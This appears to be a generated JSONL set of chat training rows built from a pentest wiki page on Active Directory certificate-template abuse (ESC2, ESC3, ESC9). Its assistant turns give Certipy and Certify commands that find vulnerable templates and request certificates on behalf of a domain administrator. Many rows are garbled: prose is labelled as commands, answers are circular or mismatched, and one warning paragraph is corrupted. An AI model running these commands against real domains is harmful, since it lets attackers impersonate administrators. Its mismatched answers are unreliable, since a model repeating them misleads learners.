"active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 62, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Certificate templates - (ESC2) Any purpose EKU"}, {"role": "assistant", "content": "When a certificate template specifies the Any Purpose EKU, or no EKU at all, the certificate can be used for anything. ESC2 can't be abused like ESC1 if the requester can't specify a SAN, however, it can be abused like ESC3 to use the certificate as requirement to request another one on behalf of any user."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Certificate templates - (ESC2) Any purpose EKU", "response": "When a certificate template specifies the Any Purpose EKU, or no EKU at all, the certificate can be used for anything. ESC2 can't be abused like ESC1 if the requester can't specify a SAN, however, it can be abused like ESC3 to use the certificate as requirement to request another one on behalf of any user.", "metadata": {"corpus_index": 63, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - (ESC2) Any purpose EKU during a pentest?"}, {"role": "assistant", "content": "When a certificate template specifies the Any Purpose EKU, or no EKU at all, the certificate can be used for anything. ESC2 can't be abused like ESC1 if the requester can't specify a SAN, however, it can be abused like ESC3 to use the certificate as requirement to request another one on behalf of any user."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - (ESC2) Any purpose EKU during a pentest?", "response": "When a certificate template specifies the Any Purpose EKU, or no EKU at all, the certificate can be used for anything. ESC2 can't be abused like ESC1 if the requester can't specify a SAN, however, it can be abused like ESC3 to use the certificate as requirement to request another one on behalf of any user.", "metadata": {"corpus_index": 63, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certificate templates - (ESC3) Certificate Agent EKU?"}, {"role": "assistant", "content": "When a certificate template specifies the Certificate Request Agent EKU, it is possible to use the issued certificate from this template to request another certificate on behalf of any user.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC3 scenario. It is possible to output the result in an archive that can be uploaded in Bloodhound.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable\n`\n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certificate templates - (ESC3) Certificate Agent EKU?", "response": "When a certificate template specifies the Certificate Request Agent EKU, it is possible to use the issued certificate from this template to request another certificate on behalf of any user.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC3 scenario. It is possible to output the result in an archive that can be uploaded in Bloodhound.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable\n`\n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell", "metadata": {"corpus_index": 64, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate templates - (ESC3) Certificate Agent EKU"}, {"role": "assistant", "content": "When a certificate template specifies the Certificate Request Agent EKU, it is possible to use the issued certificate from this template to request another certificate on behalf of any user.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC3 scenario. It is possible to output the result in an archive that can be uploaded in Bloodhound.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable\n`\n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate templates - (ESC3) Certificate Agent EKU", "response": "When a certificate template specifies the Certificate Request Agent EKU, it is possible to use the issued certificate from this template to request another certificate on behalf of any user.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC3 scenario. It is possible to output the result in an archive that can be uploaded in Bloodhound.\n\n``bash\ncertipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable\n`\n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell", "metadata": {"corpus_index": 64, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc3) certificate agent eku?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc3) certificate agent eku?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable", "metadata": {"corpus_index": 65, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC3) Certificate Agent EKU"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC3) Certificate Agent EKU", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable", "metadata": {"corpus_index": 65, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc3) certificate agent eku. (ESC3) Certificate Agent EKU"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -vulnerable`?", "response": "This command is used for certificate templates - (esc3) certificate agent eku. (ESC3) Certificate Agent EKU", "metadata": {"corpus_index": 65, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate templates - (esc3) certificate agent eku?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate templates - (esc3) certificate agent eku?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'", "metadata": {"corpus_index": 66, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate templates - (ESC3) Certificate Agent EKU"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate templates - (ESC3) Certificate Agent EKU", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'", "metadata": {"corpus_index": 66, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc3) certificate agent eku. (ESC3) Certificate Agent EKU"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template'`?", "response": "This command is used for certificate templates - (esc3) certificate agent eku. (ESC3) Certificate Agent EKU", "metadata": {"corpus_index": 66, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc3) certificate agent eku?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc3) certificate agent eku?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'", "metadata": {"corpus_index": 67, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate templates - (ESC3) Certificate Agent EKU"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate templates - (ESC3) Certificate Agent EKU", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'", "metadata": {"corpus_index": 67, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc3) certificate agent eku. (ESC3) Certificate Agent EKU"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User' -on-behalf-of 'domain\\domain admin' -pfx 'user.pfx'`?", "response": "This command is used for certificate templates - (esc3) certificate agent eku. (ESC3) Certificate Agent EKU", "metadata": {"corpus_index": 67, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\" /onbehalfon:DOMAIN\\Admin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\" /onbehalfon:DOMAIN\\Admin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!\n``\n\n:::", "metadata": {"corpus_index": 68, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\" /onbehalfon:DOMAIN\\Admin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"\n`\n\nThen, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\" /onbehalfon:DOMAIN\\Admin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!\n``\n\n:::", "metadata": {"corpus_index": 68, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Once command to find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Once command to find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.", "metadata": {"corpus_index": 69, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.", "metadata": {"corpus_index": 69, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 69, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Then, the issued certificate can be used to request another certificate permitting `Client Authentication` on behalf of another user."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Then, the issued certificate can be used to request another certificate permitting `Client Authentication` on behalf of another user.", "metadata": {"corpus_index": 70, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Then, the issued certificate can be used to request another certificate permitting `Client Authentication` on behalf of another user.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Then, the issued certificate can be used to request another certificate permitting `Client Authentication` on behalf of another user.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 70, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certificate templates - (ESC9) No security extension?"}, {"role": "assistant", "content": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nIf the certificate attribute msPKI-Enrollment-Flag contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension will not be embedded, meaning that even with StrongCertificateBindingEnforcement set to 1, the mapping will be performed similarly as a value of 0 in the registry key.\n\nHere are the requirements to perform ESC9:\n\n* StrongCertificateBindingEnforcement not set to 2 (default: 1) or CertificateMappingMethods contains UPN flag (0x4)\n* The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value\n* The template specifies client authentication\n* GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> Acate can then be used with to obtain a TGT and authenticat the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement or the CertificateMappingMethods values. It is worth to try the attack hopping the keys are misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC9 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and wants to compromise user3. user2 is allowed to enroll in a vulnerable template that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p 